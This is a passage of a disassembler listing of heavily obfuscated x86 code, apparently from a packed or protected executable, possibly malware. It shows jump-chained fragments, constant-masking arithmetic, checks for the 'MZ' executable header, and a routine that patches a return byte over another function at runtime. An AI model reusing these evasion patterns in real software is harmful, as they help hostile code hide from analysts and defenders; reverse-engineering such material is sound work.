jmp loc_4458CB
; END OF FUNCTION CHUNK FOR sub_444266
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4589E0
loc_44BE31: ; CODE XREF: sub_4589E0:loc_44C3E2j
mov ecx, 0C5F62004h
jmp loc_442A03
; END OF FUNCTION CHUNK FOR sub_4589E0
; ---------------------------------------------------------------------------
push 769AD978h
pop eax
or eax, 460702A2h
push offset sub_43DE22
jmp loc_44DDDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_44BE51: ; CODE XREF: sub_444273+DDC9j
adc eax, 90FC2B9Bh
loc_44BE57: ; CODE XREF: sub_444273:loc_43E995j
; sub_444273:loc_44C4F0j ...
jmp loc_44063C
; ---------------------------------------------------------------------------
loc_44BE5C: ; CODE XREF: sub_444273+3D2Ej
; sub_444273+104D8j
xchg ebx, [esp+0]
mov ecx, ebx
pop ebx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A45
loc_44BE64: ; CODE XREF: sub_457A45+10j
jmp loc_4511AA
; END OF FUNCTION CHUNK FOR sub_457A45
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F62
loc_44BE69: ; CODE XREF: sub_446F62+Aj
jmp loc_457183
; END OF FUNCTION CHUNK FOR sub_446F62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_44BE6E: ; CODE XREF: sub_44917B+3A9Ej
not ecx
mov edi, [ebx]
loc_44BE72: ; CODE XREF: sub_44124A:loc_458C85j
shr esi, 0Ah
jle loc_44EAFC
xchg ecx, ebp
jmp loc_448B14
; END OF FUNCTION CHUNK FOR sub_44917B
; =============== S U B R O U T I N E =======================================
sub_44BE82 proc near ; DATA XREF: sub_43BA9E+5D28o
push 0D67B2BBFh
pop edx
add edx, 0C51D32ACh
and edx, 0FBD69560h
sub edx, 4750381h
jmp loc_459F14
sub_44BE82 endp
; ---------------------------------------------------------------------------
loc_44BE9F: ; CODE XREF: ut7h7i2x:00443596j
jz loc_458B2C
shl edx, 0Ch
; START OF FUNCTION CHUNK FOR sub_446F56
loc_44BEA8: ; CODE XREF: sub_446F56:loc_443584j
add edx, 0B96BB01Ch
popf
jmp loc_43EA4F
; END OF FUNCTION CHUNK FOR sub_446F56
; ---------------------------------------------------------------------------
mov ecx, ebp
jmp sub_457F14
; ---------------------------------------------------------------------------
popf
jmp sub_456923
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_44BEC1: ; CODE XREF: sub_43B7F7:loc_445F98j
cmp ebx, eax
jmp loc_43F3EC
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44261F
loc_44BEC8: ; CODE XREF: sub_44261F:loc_4509D2j
mov esi, edx
xchg esi, [esp+8+var_8]
push 9238A1Dh
pop edx
sub edx, 8BE3A96Eh
and edx, 906A288h
jmp loc_43A70F
; END OF FUNCTION CHUNK FOR sub_44261F
; ---------------------------------------------------------------------------
pop edx
jmp loc_43A0FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_44BEEA: ; CODE XREF: sub_43AED9j
push 0E9C6EE06h
pop edx
sub edx, 0CB31EA65h
and edx, 2034C58Eh
or edx, 0D7903E5Ah
add edx, 28AFFFCEh
mov edx, [edx]
jmp loc_43F131
; END OF FUNCTION CHUNK FOR sub_43AED9
; ---------------------------------------------------------------------------
loc_44BF0F: ; CODE XREF: ut7h7i2x:loc_44A8A0j
pop ecx
loc_44BF10: ; CODE XREF: ut7h7i2x:loc_43CD29j
add ecx, 0C4FDCD6Eh
or ecx, 0A4171C51h
rol ecx, 3
add ecx, 5C880076h
jmp loc_452DD8
; ---------------------------------------------------------------------------
loc_44BF2A: ; CODE XREF: ut7h7i2x:0044B17Aj
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_44CD53
jmp loc_43E791
; ---------------------------------------------------------------------------
add ebp, edi
mov ecx, 0EAA388A0h
jmp sub_44F040
; ---------------------------------------------------------------------------
loc_44BF48: ; DATA XREF: sub_43ECFF+17059o
add ecx, 21C7F390h
xchg ecx, [esp]
jmp sub_43AA94
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_179. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_44BF57: ; CODE XREF: sub_43F1B2+3DAAj
jnz loc_4403B2
jmp loc_451AAA
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CA4
loc_44BF62: ; CODE XREF: sub_458CA4-15CF0j
sub al, 99h
; END OF FUNCTION CHUNK FOR sub_458CA4
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_44BF64: ; CODE XREF: sub_450FDE+4C3Ej
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_451AAA
jmp loc_43B9F8
; END OF FUNCTION CHUNK FOR sub_450FDE
; =============== S U B R O U T I N E =======================================
sub_44BF76 proc near ; CODE XREF: ut7h7i2x:0043C00Cj
; sub_44A9CB+B4CDp
var_4 = dword ptr -4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00439AAF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BBA3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E460 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0043EA71 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EC7E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440339 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00440DF3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A4F0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044ABFA SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044D904 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00451CEB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00458C20 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045935D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045A7D0 SIZE 00000011 BYTES
xchg eax, [esp+0]
pop eax
cmp word ptr [eax], 5A4Dh
jnz loc_456678
jmp loc_43EA71
sub_44BF76 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_44BF8A: ; CODE XREF: sub_44CE09:loc_44532Dj
push edx
push eax
push 0E01392BBh
pop eax
jmp loc_43BD09
; END OF FUNCTION CHUNK FOR sub_44CE09
; ---------------------------------------------------------------------------
loc_44BF97: ; CODE XREF: ut7h7i2x:0043B15Bj
add ecx, ebp
add ecx, 0B15A578Ch
mov ecx, [ecx]
add eax, ecx
pop ecx
xor edx, edx
push ebx
mov ebx, edx
jmp loc_44A22E
; ---------------------------------------------------------------------------
cmp ebp, eax
loc_44BFB0: ; CODE XREF: ut7h7i2x:0044C232j
jmp loc_4478E1
; ---------------------------------------------------------------------------
loc_44BFB5: ; CODE XREF: ut7h7i2x:0044A754j
jge loc_44E49B
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_44BFBB: ; CODE XREF: sub_43EF73+18863j
jmp loc_4404BB
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
xchg ebp, edx
jmp loc_44E492
; ---------------------------------------------------------------------------
push 765C6624h
pop eax
rol eax, 0Bh
or eax, 73C719ACh
jnz loc_43FACB
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_44BFDC: ; CODE XREF: sub_43FF65+7A61j
jmp loc_455FC2
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
loc_44BFE1: ; CODE XREF: ut7h7i2x:0044FBB2j
pop edx
mov eax, [esp]
push ebp
mov ebp, edx
xchg ebp, [esp]
call sub_45601B
jmp loc_441CE9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_44BFF5: ; CODE XREF: sub_452B14-19391j
jno loc_44B185
cmp edx, 2C6D5707h
jmp loc_45831A
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_44C006: ; CODE XREF: sub_4544E6-1B26Bj
add ecx, ebp
not edi
jmp loc_4428D4
; END OF FUNCTION CHUNK FOR sub_4544E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449DC4
loc_44C00F: ; CODE XREF: sub_449DC4:loc_448253j
test edx, ebp
jmp loc_4445A5
; END OF FUNCTION CHUNK FOR sub_449DC4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444851
loc_44C016: ; CODE XREF: sub_444851-B0F4j
rol esi, 1Ah
sub esi, 0A3619175h
call sub_43B5D4
loc_44C024: ; CODE XREF: sub_439BF8+16237j
jmp loc_458293
; END OF FUNCTION CHUNK FOR sub_444851
; ---------------------------------------------------------------------------
loc_44C029: ; CODE XREF: ut7h7i2x:0043EC42j
jmp loc_443B75
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F774
loc_44C02E: ; CODE XREF: sub_44F774+Bj
mov eax, 205AA81Dh
call sub_43AA94
mov ds:off_41D1B0, eax
lea eax, sub_459A71
mov byte ptr [eax], 0C3h
jmp loc_447478
; END OF FUNCTION CHUNK FOR sub_44F774
; ---------------------------------------------------------------------------
call nullsub_452
jmp ds:dword_41D1B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450231
loc_44C057: ; CODE XREF: sub_450231+1A8Ej
jmp nullsub_360
; END OF FUNCTION CHUNK FOR sub_450231
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_94. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_13. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44C05E: ; CODE XREF: ut7h7i2x:loc_4560D6j
jmp loc_4560FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4481A2
loc_44C063: ; CODE XREF: sub_4481A2-A4Fj
jmp loc_44C195
; END OF FUNCTION CHUNK FOR sub_4481A2
; =============== S U B R O U T I N E =======================================
sub_44C068 proc near ; CODE XREF: sub_441AED:loc_4391F9p
; sub_44F43B:loc_43DE8Ep ...
; FUNCTION CHUNK AT 0044D8A7 SIZE 0000000A BYTES
jnz sub_444717
push ebp
jmp loc_44D8A7
sub_44C068 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44101A
loc_44C074: ; CODE XREF: sub_44101A+16045j
xor edx, 0A4C41CDAh
and edx, 6A967133h
xor edx, 62122017h
and ecx, edx
pop edx
jmp loc_44971B
; END OF FUNCTION CHUNK FOR sub_44101A
; =============== S U B R O U T I N E =======================================
sub_44C08E proc near ; DATA XREF: sub_455060-94A9o
add ecx, 0F833E67Bh
xchg ecx, [esp+0]
jmp sub_43AED9
sub_44C08E endp
; ---------------------------------------------------------------------------
push ecx
push 0C6010890h
pop ecx
; START OF FUNCTION CHUNK FOR sub_444A08
loc_44C0A3: ; CODE XREF: sub_444A08+C425j
add ecx, 0DEC7A15Eh
rol ecx, 1Bh
xor ecx, 0C06A1618h
jmp loc_453E04
; END OF FUNCTION CHUNK FOR sub_444A08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44C0B7: ; CODE XREF: sub_43AB62:loc_44A18Ej
mov ecx, 1B82F9E7h
test esi, ebp
jmp loc_454510
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44C0C3: ; CODE XREF: sub_43A556+8BFDj
; sub_439BF8:loc_4577DBj
pop eax
rol eax, 1Ah
xor eax, ds:4000FBh
or eax, 0AC786423h
jmp loc_44F91D
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
loc_44C0D8: ; CODE XREF: ut7h7i2x:loc_454AB6j
push 94890B7Fh
mov [ecx], ebx
push 0CB38014Ah
cmp ecx, 447FC06Fh
jmp loc_455FD2
; ---------------------------------------------------------------------------
js loc_44652C
jmp sub_4450AC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449C6F
loc_44C0FA: ; CODE XREF: sub_449C6F:loc_458BC6j
pop eax
pop ebx
pop ebp
jmp loc_445C12
; END OF FUNCTION CHUNK FOR sub_449C6F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4583E7
loc_44C102: ; CODE XREF: sub_4583E7+6j
shl eax, 8
jmp loc_43F34C
; END OF FUNCTION CHUNK FOR sub_4583E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A12
loc_44C10A: ; CODE XREF: sub_444A12+6389j
or eax, eax
jnz loc_4595FE
jmp loc_43B115
; END OF FUNCTION CHUNK FOR sub_444A12
; =============== S U B R O U T I N E =======================================
sub_44C117 proc near ; DATA XREF: sub_43F506+6o
xchg edi, [esp+0]
jmp loc_43B192
sub_44C117 endp
; ---------------------------------------------------------------------------
jmp ds:off_41D020
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4454CF
loc_44C125: ; CODE XREF: sub_4454CF+Bj
jmp nullsub_405
; END OF FUNCTION CHUNK FOR sub_4454CF
; ---------------------------------------------------------------------------
loc_44C12A: ; CODE XREF: ut7h7i2x:00443B2Dj
jmp loc_452C96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_44C12F: ; CODE XREF: sub_4489DF:loc_43B192j
; sub_4489DF:loc_441159j ...
pop edx
js loc_456A4C
mov eax, [esp-4+arg_0]
push edx
push eax
jmp loc_45A8E2
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456923
loc_44C140: ; CODE XREF: sub_456923+1Cj
and esi, 0F7AA1706h
add esi, 0AAA4886Eh
xchg esi, [esp+0]
jmp loc_443454
; END OF FUNCTION CHUNK FOR sub_456923
; ---------------------------------------------------------------------------
loc_44C154: ; CODE XREF: ut7h7i2x:loc_43A786j
test ebx, 800000h
jmp loc_43E8DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45ADF0
loc_44C15F: ; CODE XREF: sub_45ADF0:loc_4590A6j
pop ecx
or ecx, 1EC71C15h
rol ecx, 19h
or ecx, 4A1063C3h
and ecx, 1176B0BCh
push offset sub_43FDAD
loc_44C17A: ; CODE XREF: ut7h7i2x:0043BF98j
jmp nullsub_477
; END OF FUNCTION CHUNK FOR sub_45ADF0
; ---------------------------------------------------------------------------
pop edx
loc_44C180: ; CODE XREF: ut7h7i2x:loc_4495AEj
jmp loc_44E3CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4402A5
loc_44C185: ; CODE XREF: sub_4402A5:loc_453754j
; sub_4402A5+135DEj
call sub_44BB6F
retn
; ---------------------------------------------------------------------------
loc_44C18B: ; CODE XREF: sub_4402A5:loc_43B75Ej
call sub_43DAFF
; END OF FUNCTION CHUNK FOR sub_4402A5
; START OF FUNCTION CHUNK FOR sub_449C6F
loc_44C190: ; CODE XREF: sub_449C6F-C855j
jmp loc_458BB5
; END OF FUNCTION CHUNK FOR sub_449C6F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4481A2
loc_44C195: ; CODE XREF: sub_4481A2:loc_44C063j
jz loc_447384
cmp eax, 0FFFFFFFFh
jz loc_447384
mov eax, [eax]
jmp loc_449226
; END OF FUNCTION CHUNK FOR sub_4481A2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_44C1AB: ; CODE XREF: sub_43DBEC:loc_43C33Aj
pop eax
and eax, 0C0EA8C3Ch
jnz loc_43F183
loc_44C1B8: ; CODE XREF: ut7h7i2x:0044576Bj
jmp loc_44C41F
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_44C1BD: ; CODE XREF: sub_4433C5-7CFEj
jmp loc_44267C
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
cmp ecx, 0A6ABCCD5h
jmp loc_43F177
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DB48
loc_44C1CD: ; CODE XREF: sub_44DB48-A483j
pop ecx
or ecx, 54E1C22Ah
xor ecx, 1432A741h
sub ecx, 44713E58h
add ecx, 60DC515Eh
mov ecx, [ecx]
movzx edx, byte ptr [ecx+edx]
and eax, edx
jmp loc_452C0B
; END OF FUNCTION CHUNK FOR sub_44DB48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC6F
loc_44C1F3: ; CODE XREF: sub_44EC6F:loc_458EEFj
add edi, 0FB2FDA3h
and edi, 0C56841F9h
rol edi, 13h
cmp edi, 350E374Fh
jmp loc_456EDB
; END OF FUNCTION CHUNK FOR sub_44EC6F
; =============== S U B R O U T I N E =======================================
sub_44C20D proc near ; DATA XREF: ut7h7i2x:0045A87Do
; FUNCTION CHUNK AT 0043DDBF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043E91A SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00442E45 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448417 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CD5B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00450A75 SIZE 00000005 BYTES
cmp dword ptr [ebp-8], 0
jz loc_4569A7
jmp loc_450A75
sub_44C20D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_44C21C: ; CODE XREF: sub_441765:loc_44DF27j
xor esi, 881BD9A9h
rol edi, 1Eh
cmp edx, eax
jmp loc_44F936
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
loc_44C22C: ; CODE XREF: ut7h7i2x:0044E983j
jge loc_4424E6
jb loc_44BFB0
jmp loc_455434
; ---------------------------------------------------------------------------
sbb edx, eax
jmp loc_43F6E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_44C244: ; CODE XREF: sub_45742F:loc_4400A0j
add eax, 2DD3D480h
xor eax, 978374C7h
push edi
push 3931D671h
jmp loc_44493B
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_44C25B: ; CODE XREF: sub_44F495:loc_44F4EAj
mov [ebp+0], edi
pop edx
xor ecx, eax
sub edx, ecx
jmp loc_45951D
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440F8E
loc_44C268: ; CODE XREF: sub_440F8E+22F9j
sbb ebx, 50BCD11h
loc_44C26E: ; CODE XREF: sub_440F8E:loc_449627j
call sub_456E7D
; END OF FUNCTION CHUNK FOR sub_440F8E
; =============== S U B R O U T I N E =======================================
sub_44C273 proc near ; CODE XREF: sub_448321-CDFCp
; sub_43B873+Bp ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043CBA8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043D967 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442664 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044320D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004440CC SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044DC31 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450BE4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045104B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004517CE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451FD7 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004538C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454FBE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455293 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004569A7 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045A7C3 SIZE 00000005 BYTES
push ebp
call sub_43E9CB
loc_44C279: ; CODE XREF: ut7h7i2x:00440922j
jmp loc_44320D
sub_44C273 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44C27E: ; CODE XREF: ut7h7i2x:0044BC12j
jo loc_45A87A
not ebx
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44C286: ; CODE XREF: sub_439BF8:loc_459F0Ej
sub esi, 70698AB5h
and esi, 0ACC321FDh
js loc_453F11
; END OF FUNCTION CHUNK FOR sub_439BF8
; START OF FUNCTION CHUNK FOR sub_457E3D
loc_44C298: ; CODE XREF: sub_457E3D+7j
jmp loc_446735
; END OF FUNCTION CHUNK FOR sub_457E3D
; ---------------------------------------------------------------------------
cmp ebp, 83502F45h
jmp loc_44960C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_44C2A8: ; CODE XREF: sub_43EF73:loc_44C35Ej
mov eax, [eax]
or eax, eax
jz loc_4477F3
jmp loc_441C4E
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
loc_44C2B7: ; CODE XREF: ut7h7i2x:loc_454053j
adc eax, 79B6C815h
sub eax, edx
ror edx, 1Fh
jmp loc_459B29
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44124A
loc_44C2C7: ; CODE XREF: sub_44124A+382Cj
sub ebx, ebp
add edi, 80DBCC23h
test ebp, edx
jmp loc_458C85
; END OF FUNCTION CHUNK FOR sub_44124A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457541
loc_44C2D6: ; CODE XREF: sub_457541-8B38j
jb sub_44D3B0
pop ebx
jmp loc_458DA4
; END OF FUNCTION CHUNK FOR sub_457541
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_44C2E2: ; CODE XREF: ut7h7i2x:0043F1CEj
; sub_457A66:loc_4445A5j
cmp edx, 0EB48003Fh
jmp loc_44DCBC
; END OF FUNCTION CHUNK FOR sub_457A66
; =============== S U B R O U T I N E =======================================
sub_44C2ED proc near ; CODE XREF: sub_457A0D-15FEAp
; ut7h7i2x:0044B1B5j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043F1E6 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00440D01 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
push ecx
push 1A2B1975h
xchg edi, [esp+4+var_4]
jmp loc_440D01
sub_44C2ED endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442F0F
loc_44C2FF: ; CODE XREF: sub_442F0F:loc_456A0Aj
jnz loc_442F16
retn
; ---------------------------------------------------------------------------
loc_44C306: ; CODE XREF: sub_442F0F:loc_442F16j
push offset loc_45A43C
jmp nullsub_85
; END OF FUNCTION CHUNK FOR sub_442F0F
; ---------------------------------------------------------------------------
loc_44C310: ; CODE XREF: ut7h7i2x:00459727j
xor edx, 6E9BEA79h
mov ecx, esi
jmp loc_44F1DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_44C31D: ; CODE XREF: sub_4431FF:loc_44D5A0j
rol esi, 10h
pop esi
ror edi, 1Dh
jmp loc_459971
; END OF FUNCTION CHUNK FOR sub_4431FF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_207. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44C32A: ; CODE XREF: ut7h7i2x:0044DA2Cj
jmp loc_440BD1
; ---------------------------------------------------------------------------
loc_44C32F: ; CODE XREF: ut7h7i2x:0044B508j
jmp loc_442462
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44C334: ; CODE XREF: sub_43A556+DF0Fj
jmp loc_44D0C7
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4456F4
loc_44C339: ; CODE XREF: ut7h7i2x:loc_43AA66j
; sub_4456F4-92FEj
jmp nullsub_126
; END OF FUNCTION CHUNK FOR sub_4456F4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_130. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_44C33F: ; CODE XREF: sub_43AA94+1028Cj
jmp loc_4442FE
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A32D
loc_44C344: ; CODE XREF: sub_45A32D-11EBDj
mov ebx, esi
jmp loc_44B3F1
; END OF FUNCTION CHUNK FOR sub_45A32D
; ---------------------------------------------------------------------------
locret_44C34B: ; CODE XREF: ut7h7i2x:loc_451407j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454DE8
loc_44C34C: ; CODE XREF: sub_454DE8-18B28j
jmp nullsub_203
; END OF FUNCTION CHUNK FOR sub_454DE8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_44C351: ; CODE XREF: sub_43EF73:loc_44EE3Dj
pop edx
rol edx, 0Ch
xor edx, 9617DE2Fh
add eax, edx
pop edx
loc_44C35E: ; CODE XREF: ut7h7i2x:loc_44DDB2j
jmp loc_44C2A8
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
loc_44C363: ; CODE XREF: ut7h7i2x:00446D23j
adc edx, 906E236Ch
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_44C369: ; CODE XREF: sub_44D1F0:loc_446D17j
add eax, 1137D82Fh
loc_44C36F: ; CODE XREF: sub_44E8A5:loc_44BB77j
; ut7h7i2x:loc_451100j
xor eax, 0CC82617Ah
add eax, 658A7990h
call sub_44D807
loc_44C380: ; CODE XREF: sub_44917B:loc_456305j
mov esi, [esi]
cmp eax, esi
pop esi
jbe loc_44A5B7
jmp loc_457EB1
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451284
loc_44C390: ; CODE XREF: sub_451284+Cj
call sub_44F256
loc_44C395: ; CODE XREF: ut7h7i2x:00448682j
jmp nullsub_442
; END OF FUNCTION CHUNK FOR sub_451284
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442489
loc_44C39A: ; CODE XREF: sub_442489+Bj
jmp nullsub_551
; END OF FUNCTION CHUNK FOR sub_442489
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_44C39F: ; CODE XREF: sub_446F9A-C835j
adc ebp, ecx
ror ecx, 1Bh
xor edx, 3FB9DCEDh
jmp loc_458445
; END OF FUNCTION CHUNK FOR sub_446F9A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459FE9
loc_44C3AF: ; CODE XREF: sub_459FE9+9j
sub al, 99h
push 0F5C02922h
xchg ebx, [esp+4+var_4]
mov edx, ebx
jmp loc_459CA2
; END OF FUNCTION CHUNK FOR sub_459FE9
; ---------------------------------------------------------------------------
cmp eax, [ebp-0Ch]
jnz loc_43FBA5
jmp loc_44F0CD
; ---------------------------------------------------------------------------
loc_44C3CE: ; DATA XREF: ut7h7i2x:0044DDA8o
mov ds:dword_4487E4, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A8C1
loc_44C3D5: ; CODE XREF: sub_45A8C1+Ej
jmp loc_439068
; END OF FUNCTION CHUNK FOR sub_45A8C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457453
loc_44C3DA: ; CODE XREF: sub_457453+2266j
rol eax, 14h
call sub_449B57
; END OF FUNCTION CHUNK FOR sub_457453
; START OF FUNCTION CHUNK FOR sub_4589E0
loc_44C3E2: ; CODE XREF: sub_4589E0-14EFBj
jmp loc_44BE31
; END OF FUNCTION CHUNK FOR sub_4589E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EFC4
loc_44C3E7: ; CODE XREF: sub_43EFC4+FDEj
jmp sub_43F058
; END OF FUNCTION CHUNK FOR sub_43EFC4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F300
loc_44C3EC: ; CODE XREF: sub_44F300:loc_44CA10j
mov al, [eax]
and al, 0F6h
cmp al, 0C2h
jz loc_44920C
mov eax, [ebp-4]
mov ax, [eax]
and ax, 38FFh
cmp ax, 20FFh
jmp loc_448A3B
; END OF FUNCTION CHUNK FOR sub_44F300
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455DCD
loc_44C40B: ; CODE XREF: sub_455DCD:loc_43D3D0j
mov esi, [eax]
and edi, ebp
loc_44C40F: ; CODE XREF: sub_43DBEC-3509j
sbb ebx, 9F187B3Bh
jmp loc_4455E4
; END OF FUNCTION CHUNK FOR sub_455DCD
; ---------------------------------------------------------------------------
loc_44C41A: ; CODE XREF: ut7h7i2x:loc_4482A9j
call sub_43AF2D
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_44C41F: ; CODE XREF: ut7h7i2x:loc_43A6A6j
; sub_43DBEC:loc_44C1B8j
jnz loc_4406BE
jmp loc_45332C
